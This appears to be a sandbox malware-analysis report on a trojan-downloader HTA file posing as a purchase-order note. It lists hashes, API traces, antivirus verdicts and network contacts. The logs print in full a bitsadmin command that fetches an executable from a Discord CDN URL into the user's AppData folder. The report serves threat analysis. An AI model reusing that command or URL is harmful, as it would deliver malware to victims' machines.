Summary | ZeroBOX

2022_12_PO-note_page-0002.hta

Category Machine Started Completed
FILE s1_win7_x6401 May 23, 2023, 5:13 p.m. May 23, 2023, 5:17 p.m.
Size 976.0B
Type HTML document, ASCII text, with CRLF line terminators
MD5 dada4c04af88637d79abfec8ed74e568
SHA256 667561ab07beadb79120d3548d12417c66187ab72ee18ce4fa659a3c897e4fe1
CRC32 6C53DABB
ssdeep 24:hMNmMvy4GqptEIjb18qee0rp8xuY8yu5yNHRSBl88e/ZM8E4olEC:ImMqopOIjb1p0rd4ucNHRSoyt40F
Yara None matched

IP Address Status Action
162.159.129.233 Active Moloch
164.124.101.2 Active Moloch

Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: BITSADMIN version 3.0 [ 7.5.7601 ]
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: BITS administration utility.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: (C) Copyright 2000-2006 Microsoft Corp.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: DISPLAY: '
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: TYPE:
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: DOWNLOAD
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: STATE:
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: CONNECTING
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: PRIORITY:
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: NORMAL
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: FILES:
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: BYTES:
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 0 / UNKNOWN
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: TRANSFER RATE:
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 0.00 B/S
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: DISPLAY: '
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: TYPE:
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: DOWNLOAD
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: STATE:
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: ERROR
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: PRIORITY:
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: NORMAL
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: FILES:
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: BYTES:
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 0 / UNKNOWN
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Unable to complete transfer.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: ERROR FILE:
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: https://cdn.discordapp.com/attachments/1062280171790540840/10630
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: ERROR CODE:
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 0x80072f7d - 보안 채널 지원에서 오류가 발생했습니다.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: ERROR CONTEXT:
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 0x00000005 - 원격 파일을 처리하는 동안 오류가 발생했습니다.
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bc2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x040e0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x040e0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x040e0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x040e0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x040e0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x040e0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x040e0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x040e1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x040e1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x040e1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x040e2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x040e2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x040e2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x040e2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x040e2000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: bitsadmin
parameters: /transfer 8 https://cdn.discordapp.com/attachments/1062280171790540840/1063090692613746718/aDTUAh4aJrmzMHA.exe C:\Users\test22\AppData\Roaming\aDTUAh4aJrmzMHA.exe
filepath: bitsadmin
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 16 (PAGE_EXECUTE)
base_address: 0x040e0000
process_handle: 0xffffffff
1 0 0
cmdline bitsadmin /transfer 8 https://cdn.discordapp.com/attachments/1062280171790540840/1063090692613746718/aDTUAh4aJrmzMHA.exe C:\Users\test22\AppData\Roaming\aDTUAh4aJrmzMHA.exe
cmdline "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://cdn.discordapp.com/attachments/1062280171790540840/1063090692613746718/aDTUAh4aJrmzMHA.exe C:\Users\test22\AppData\Roaming\aDTUAh4aJrmzMHA.exe
Lionic Trojan.Script.Alien.4!c
DrWeb VBS.DownLoader.2666
FireEye Trojan.GenericKD.64953680
VIPRE Trojan.GenericKD.64953680
Sangfor Trojan.Generic-Script.Save.dad56280
Arcabit Trojan.Generic.D3DF1D50
Cyren JS/Agent.ATW!Eldorado
Symantec CL.Downloader!gen92
ESET-NOD32 VBS/TrojanDownloader.Agent.WUN
Avast Script:SNH-gen [Trj]
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan-Downloader.Script.Generic
BitDefender Trojan.GenericKD.64953680
MicroWorld-eScan Trojan.GenericKD.64953680
Rising Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:F97ZczZOAr)
Emsisoft Trojan.GenericKD.64953680 (B)
Ikarus Trojan-Downloader.VBS.Agent
Avira VBS/Dldr.Agent.VPDI
Microsoft TrojanDownloader:VBS/Tnega.RVD!MTB
GData Trojan.GenericKD.64953680
Google Detected
ALYac Trojan.GenericKD.64953680
Tencent Vbs.Trojan-Downloader.Der.Sgil
MAX malware (ai score=85)
Fortinet VBS/Agent.VHJ!tr.dldr
AVG Script:SNH-gen [Trj]